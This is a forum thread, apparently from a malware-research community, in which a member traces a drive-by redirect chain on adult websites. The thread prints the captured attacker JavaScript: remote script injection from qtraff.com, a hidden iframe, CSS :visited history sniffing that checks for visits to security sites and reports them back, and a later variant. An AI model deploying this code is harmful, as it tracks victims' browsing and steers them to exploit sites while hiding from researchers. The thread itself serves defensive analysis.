Author Topic: Only infect if you haven't been to malwaredomainlist.com  (Read 8154 times)

0 Members and 1 Guest are viewing this topic.

October 18, 2008, 06:45:17 pm
Read 8154 times

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Starting at http://berrykinky.com clicking a picture to go to another site.

http://berrykinky.com/st/st.php?id=13615&script=1&url=http://doctorassmaster.com/ip/69/?id=cuwydotcom&p=

Code: [Select]
<script>if(opener&&!opener.closed){sc=opener.document.createElement('script');sc.src='http://qtraff.com/js.php';opener.document.body.appendChild(sc);}</script><script>window.name='qwnew';</script><script>window.location.reload();</script><noscript><meta http-equiv='refresh' content='1; URL=/st/st.php?id=13615&script=1&url=http://doctorassmaster.com/ip/69/?id=cuwydotcom&p='></noscript>

Code: [Select]
GET /js.php HTTP/1.1
Accept: */*
Referer: http://berrykinky.com/
Accept-Language: en-gb
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: qtraff.com
Connection: Keep-Alive

Code: [Select]
ifr=window.document.createElement('iframe'); ifr.src='http://qtraff.com/fr.php'; ifr.style.visibility='hidden'; ifr.style.position='absolute'; window.document.body.appendChild(ifr);

Code: [Select]
GET /fr.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://berrykinky.com/
Accept-Language: en-gb
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: qtraff.com
Connection: Keep-Alive



Code: [Select]
<html>
<head>
<style type="text/css">
.o {visibility: hidden}
.o:visited {margin-left: 10px}
</style>
</head>
<body leftmargin="0" topmargin="0">
<a href="http://adultbizforum.com/" class="o">o</a><br>
<a href="http://adultwebmasterinfo.com/" class="o">o</a><br>
<a href="http://adultwebmastermeeting.com/" class="o">o</a><br>
<a href="http://apscripts.com/" class="o">o</a><br>
<a href="http://armadaboard.com/" class="o">o</a><br>
<a href="http://arrowscripts.com/" class="o">o</a><br>
<a href="http://askdamagex.com/" class="o">o</a><br>
<a href="http://bbs.adultwebmasterinfo.com/" class="o">o</a><br>
<a href="http://bbs.mediumpimpin.com/" class="o">o</a><br>
<a href="http://boards.xbiz.com/" class="o">o</a><br>
<a href="http://cheaterhell.com/" class="o">o</a><br>
<a href="http://chokertraffic.com/" class="o">o</a><br>
<a href="http://cj-racer.com/" class="o">o</a><br>
<a href="http://cjlog.com/" class="o">o</a><br>
<a href="http://clickzs.com/" class="o">o</a><br>
<a href="http://comusthumbs.com/" class="o">o</a><br>
<a href="http://cozyfrog.com/" class="o">o</a><br>
<a href="http://crutop.nu/" class="o">o</a><br>
<a href="http://crutop.nu/Vbulletin/" class="o">o</a><br>
<a href="http://dtrotator.com/" class="o">o</a><br>
<a href="http://fhgstore.com/" class="o">o</a><br>
<a href="http://forum.krawl.com/" class="o">o</a><br>
<a href="http://gallerytrafficservice.com/" class="o">o</a><br>
<a href="http://gallerytrafficservice.com/client/" class="o">o</a><br>
<a href="http://gofuckbiz.com/" class="o">o</a><br>
<a href="http://greenguyandjim.com/" class="o">o</a><br>
<a href="http://gtsru.com/" class="o">o</a><br>
<a href="http://jmbsoft.com/" class="o">o</a><br>
<a href="http://justblowme.com/" class="o">o</a><br>
<a href="http://krawl.com/" class="o">o</a><br>
<a href="http://linkex.dk/" class="o">o</a><br>
<a href="http://mediumpimpin.com/" class="o">o</a><br>
<a href="http://netpond.com/" class="o">o</a><br>
<a href="http://pimpboard.com/" class="o">o</a><br>
<a href="http://pornstarkings.com/" class="o">o</a><br>
<a href="http://protect-x.com/" class="o">o</a><br>
<a href="http://proton-tm.com/" class="o">o</a><br>
<a href="http://rusadult.com/" class="o">o</a><br>
<a href="http://rusawm.com/" class="o">o</a><br>
<a href="http://smart-scripts.com/" class="o">o</a><br>
<a href="http://streamscripts.com/" class="o">o</a><br>
<a href="http://submitpasses.com/" class="o">o</a><br>
<a href="http://submitter.krawl.com/submitters/" class="o">o</a><br>
<a href="http://submitter.krawl.com/submitters/submit.php" class="o">o</a><br>
<a href="http://tgpsoftware.com/" class="o">o</a><br>
<a href="http://tgpteam.com/" class="o">o</a><br>
<a href="http://trafficadept.com/" class="o">o</a><br>
<a href="http://trafficholder.com/" class="o">o</a><br>
<a href="http://trafficroup.com/" class="o">o</a><br>
<a href="http://umaxforum.com/" class="o">o</a><br>
<a href="http://www.adultbizforum.com/" class="o">o</a><br>
<a href="http://www.adultwebmasterinfo.com/" class="o">o</a><br>
<a href="http://www.adultwebmastermeeting.com/" class="o">o</a><br>
<a href="http://www.apscripts.com/" class="o">o</a><br>
<a href="http://www.armadaboard.com/" class="o">o</a><br>
<a href="http://www.arrowscripts.com/" class="o">o</a><br>
<a href="http://www.askdamagex.com/" class="o">o</a><br>
<a href="http://www.cheaterhell.com/" class="o">o</a><br>
<a href="http://www.chokertraffic.com/" class="o">o</a><br>
<a href="http://www.cj-racer.com/" class="o">o</a><br>
<a href="http://www.cjlog.com/" class="o">o</a><br>
<a href="http://www.clickzs.com/" class="o">o</a><br>
<a href="http://www.comusthumbs.com/" class="o">o</a><br>
<a href="http://www.cozyfrog.com/" class="o">o</a><br>
<a href="http://www.crutop.nu/" class="o">o</a><br>
<a href="http://www.crutop.nu/Vbulletin/" class="o">o</a><br>
<a href="http://www.dtrotator.com/" class="o">o</a><br>
<a href="http://www.fhgstore.com/" class="o">o</a><br>
<a href="http://www.gallerytrafficservice.com/" class="o">o</a><br>
<a href="http://www.gallerytrafficservice.com/client/" class="o">o</a><br>
<a href="http://www.gfy.com/" class="o">o</a><br>
<a href="http://www.gofuckbiz.com/" class="o">o</a><br>
<a href="http://www.gofuckyourself.com/" class="o">o</a><br>
<a href="http://www.greenguyandjim.com/" class="o">o</a><br>
<a href="http://www.gtsru.com/" class="o">o</a><br>
<a href="http://www.jmbsoft.com/" class="o">o</a><br>
<a href="http://www.justblowme.com/" class="o">o</a><br>
<a href="http://www.krawl.com/" class="o">o</a><br>
<a href="http://www.linkex.dk/" class="o">o</a><br>
<a href="http://www.master-x.com/" class="o">o</a><br>
<a href="http://www.master-x.com/forum/" class="o">o</a><br>
<a href="http://www.mediumpimpin.com/" class="o">o</a><br>
<a href="http://www.netpond.com/" class="o">o</a><br>
<a href="http://www.paydir.com/" class="o">o</a><br>
<a href="http://www.pimpboard.com/" class="o">o</a><br>
<a href="http://www.pornstarkings.com/" class="o">o</a><br>
<a href="http://www.protect-x.com/" class="o">o</a><br>
<a href="http://www.proton-tm.com/" class="o">o</a><br>
<a href="http://www.rusadult.com/" class="o">o</a><br>
<a href="http://www.rusawm.com/" class="o">o</a><br>
<a href="http://www.smart-scripts.com/" class="o">o</a><br>
<a href="http://www.streamscripts.com/" class="o">o</a><br>
<a href="http://www.submitpasses.com/" class="o">o</a><br>
<a href="http://www.tgpsoftware.com/" class="o">o</a><br>
<a href="http://www.tgpteam.com/" class="o">o</a><br>
<a href="http://www.trafficadept.com/" class="o">o</a><br>
<a href="http://www.trafficholder.com/" class="o">o</a><br>
<a href="http://www.trafficroup.com/" class="o">o</a><br>
<a href="http://www.umaxforum.com/" class="o">o</a><br>
<a href="http://www.xbiz.com/" class="o">o</a><br>
<a href="http://www.xclicks.net/" class="o">o</a><br>
<a href="http://www.ynot.com/" class="o">o</a><br>
<a href="http://xbiz.com/" class="o">o</a><br>
<a href="http://xclicks.net/" class="o">o</a><br>
<a href="http://www.malwaredomainlist.com/" class="o">o</a><br>
<a href="http://www.malwaredomainlist.com/mdl.php" class="o">o</a><br>
<a href="http://www.malwaredomainlist.com/update.php" class="o">o</a><br>
<a href="http://viruslist.com/" class="o">o</a><br>
<a href="http://www.viruslist.com/" class="o">o</a><br>
<a href="http://cleanthe.net/" class="o">o</a><br>
<a href="http://www.cleanthe.net/" class="o">o</a><br>
<a href="http://vpornmovies.com/t1.php" id="qwlink" target="qwnew">click</a>
<script>
var bad=0;
var dom=new String();
for (var s=0;s<document.links.length;s++){
if (document.links[s].className=='o' && document.links[s].offsetLeft>=10){
bad=1;
dom=document.links[s].href;
break;
}
}
if (bad==0) {
setTimeout("document.getElementById('qwlink').click();", 3000);
}
else document.write("<link href='http://qtraff.com/addip.php?dom="+dom+"' rel='stylesheet'>");
</script>
</body>


From that point if it doesn't find any of those sites, it will redirect you a couple more times before ending up on an exploit site.

October 19, 2008, 01:10:06 pm
Reply #1

sowhat-x

  • Guest
...so they're afraid of MDL,Kaspersky and CleanThe.net?Lmao...they are at least ridiculous...  :D
And pretty much the easiest way to get rid of stupid tricks like this:
https://addons.mozilla.org/en-US/firefox/addon/1999

April 30, 2009, 02:40:48 pm
Reply #2

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
A newer version, code is changed slightly but does the same thing.

http://lifeporn.net
http://lifeporn.net/t/html.php?script=js

Code: [Select]
document.write("<style type='text/css'>.u96{visibility:hidden;position:absolute;}.u96:link{visibility:hidden;position:absolute;left:0px}.u96:visited{visibility:hidden;left:10px}.u97{visibility:hidden;position:absolute;}.u97:link{visibility:hidden;position:absolute;left:0px;}.u97:visited{visibility:hidden;position:absolute;left:10px;}</style>");var url=new Array();
url[0]='http://adultwebmasterinfo.com/';
url[1]='http://www.adultwebmasterinfo.com/';
url[2]='http://adultwebmastermeeting.com/';
url[3]='http://www.adultwebmastermeeting.com/';
url[4]='http://apscripts.com/';
url[5]='http://www.apscripts.com/';
url[6]='http://armadaboard.com/';
url[7]='http://www.armadaboard.com/';
url[8]='http://arrowscripts.com/';
url[9]='http://www.arrowscripts.com/';
url[10]='http://askdamagex.com/';
url[11]='http://www.askdamagex.com/';
url[12]='http://cheaterhell.com/';
url[13]='http://www.cheaterhell.com/';
url[14]='http://chokertraffic.com/';
url[15]='http://www.chokertraffic.com/';
url[16]='http://cj-racer.com/';
url[17]='http://www.cj-racer.com/';
url[18]='http://cjlog.com/';
url[19]='http://www.cjlog.com/';
url[20]='http://clickzs.com/';
url[21]='http://www.clickzs.com/';
url[22]='http://comusthumbs.com/';
url[23]='http://www.comusthumbs.com/';
url[24]='http://cozyfrog.com/';
url[25]='http://www.cozyfrog.com/';
url[26]='http://crutop.nu/';
url[27]='http://www.crutop.nu/';
url[28]='http://crutop.nu/Vbulletin/';
url[29]='http://www.crutop.nu/Vbulletin/';
url[30]='http://dtrotator.com/';
url[31]='http://www.dtrotator.com/';
url[32]='http://fhgstore.com/';
url[33]='http://www.fhgstore.com/';
url[34]='http://gallerytrafficservice.com/';
url[35]='http://www.gallerytrafficservice.com/';
url[36]='http://gallerytrafficservice.com/client/';
url[37]='http://www.gallerytrafficservice.com/client/';
url[38]='http://gofuckbiz.com/';
url[39]='http://www.gofuckbiz.com/';
url[40]='http://greenguyandjim.com/';
url[41]='http://www.greenguyandjim.com/';
url[42]='http://gtsru.com/';
url[43]='http://www.gtsru.com/';
url[44]='http://jmbsoft.com/';
url[45]='http://www.jmbsoft.com/';
url[46]='http://justblowme.com/';
url[47]='http://www.justblowme.com/';
url[48]='http://klikforum.com/';
url[49]='http://www.klikforum.com/';
url[50]='http://krawl.com/';
url[51]='http://www.krawl.com/';
url[52]='http://linkex.dk/';
url[53]='http://www.linkex.dk/';
url[54]='http://mediumpimpin.com/';
url[55]='http://www.mediumpimpin.com/';
url[56]='http://netpond.com/';
url[57]='http://www.netpond.com/';
url[58]='http://pimpboard.com/';
url[59]='http://www.pimpboard.com/';
url[60]='http://pornstarkings.com/';
url[61]='http://www.pornstarkings.com/';
url[62]='http://protect-x.com/';
url[63]='http://www.protect-x.com/';
url[64]='http://proton-tm.com/';
url[65]='http://www.proton-tm.com/';
url[66]='http://rusadult.com/';
url[67]='http://www.rusadult.com/';
url[68]='http://rusawm.com/';
url[69]='http://www.rusawm.com/';
url[70]='http://smart-scripts.com/';
url[71]='http://www.smart-scripts.com/';
url[72]='http://streamscripts.com/';
url[73]='http://www.streamscripts.com/';
url[74]='http://submitpasses.com/';
url[75]='http://www.submitpasses.com/';
url[76]='http://tgpsoftware.com/';
url[77]='http://www.tgpsoftware.com/';
url[78]='http://tgpteam.com/';
url[79]='http://www.tgpteam.com/';
url[80]='http://trafficadept.com/';
url[81]='http://www.trafficadept.com/';
url[82]='http://trafficholder.com/';
url[83]='http://www.trafficholder.com/';
url[84]='http://trafficroup.com/';
url[85]='http://www.trafficroup.com/';
url[86]='http://umaxforum.com/';
url[87]='http://www.umaxforum.com/';
url[88]='http://xbiz.com/';
url[89]='http://www.xbiz.com/';
url[90]='http://xclicks.net/';
url[91]='http://www.xclicks.net/';
url[92]='http://ynot.com/';
url[93]='http://www.ynot.com/';
url[94]='http://viruslist.com/';
url[95]='http://www.viruslist.com/';
url[96]='http://malwaredomainlist.com/mdl.php';
url[97]='http://www.malwaredomainlist.com/mdl.php';
url[98]='http://x2more.com';
url[99]='http://www.x2more.com';
url[100]='http://x2more.com/checker';
url[101]='http://www.x2more.com/checker';
url[102]='http://cjwebmasters.com';
url[103]='http://www.cjwebmasters.com';
url[104]='http://deluxepass.com';
url[105]='http://www.deluxepass.com';
url[106]='http://epassporte.com';
url[107]='http://www.epassporte.com';
url[108]='http://statsremote.com';
url[109]='http://www.statsremote.com';
url[110]='http://submitter.krawl.com/submitters/submit.php';
url[111]='http://bbs.adultwebmasterinfo.com/';
url[112]='http://bbs.mediumpimpin.com/';
url[113]='http://forum.krawl.com/';
url[114]='http://boards.xbiz.com/';
var b11=0,t11='',g11=0;var b12=0,t12='',g12=0;var lin;for (var s=0;s<url.length;s++){document.write("<a href='"+url[s]+"' class='u96' id='l"+s+"'>"+url[s]+"</a>");lin=document.getElementById("l"+s);if(lin.offsetLeft>0){b11=url[s];t11=s;g11=1;break;}};if(g11==1){window.document.write("<scr"+"ipt src='http://www.lifeporn.net/t/html.php?addip="+b11+"&type="+t11+"'></scr"+"ipt>");}else if(g11==0){if(opener&&!opener.closed){window.opener.location.replace('http://lifeporn.net/');window.location.href='http://ahmilf.com/r/r.php?l=2';}opener=0;}else if(g11==0&&g12==0){}

http://ahmilf.com/r/r.php?l=2

Code: [Select]
<html><body onLoad="document.qwer.submit()">
<form action='/' method=post name="qwer">
<input type=hidden name=qwerty value='lfdshsdljflsd'>
<input type=hidden name=r value='aHR0cDovL3d3dy50cmFmZmljaG9sZGVyLmNvbS9pbi9pbi5waHA/a29yb2Vk'>
</form></body></html>

http://lifeporn.net/r/r.php?h=2&a=65bf9b73b0e93836b908dd4a5a9275f9
http://lifeporn.net/r/r.php?gthbnjybn=aHR0cDovL3d3dy50cmFmZmljaG9sZGVyLmNvbS9pbi9pbi5waHA%2FbGlmZXBvcm4%3D&r=1

http://www.trafficholder.com/in/in.php?lifeporn

TrafficHolder is a third party site, it is for selling/buying traffic. Some of the urls you may be directed to are legitimate, some may be malicious. You can see the affiliate id "lifeporn" at the end of the url. It is one of the many sites that traffic traders use for their TGPs to make money.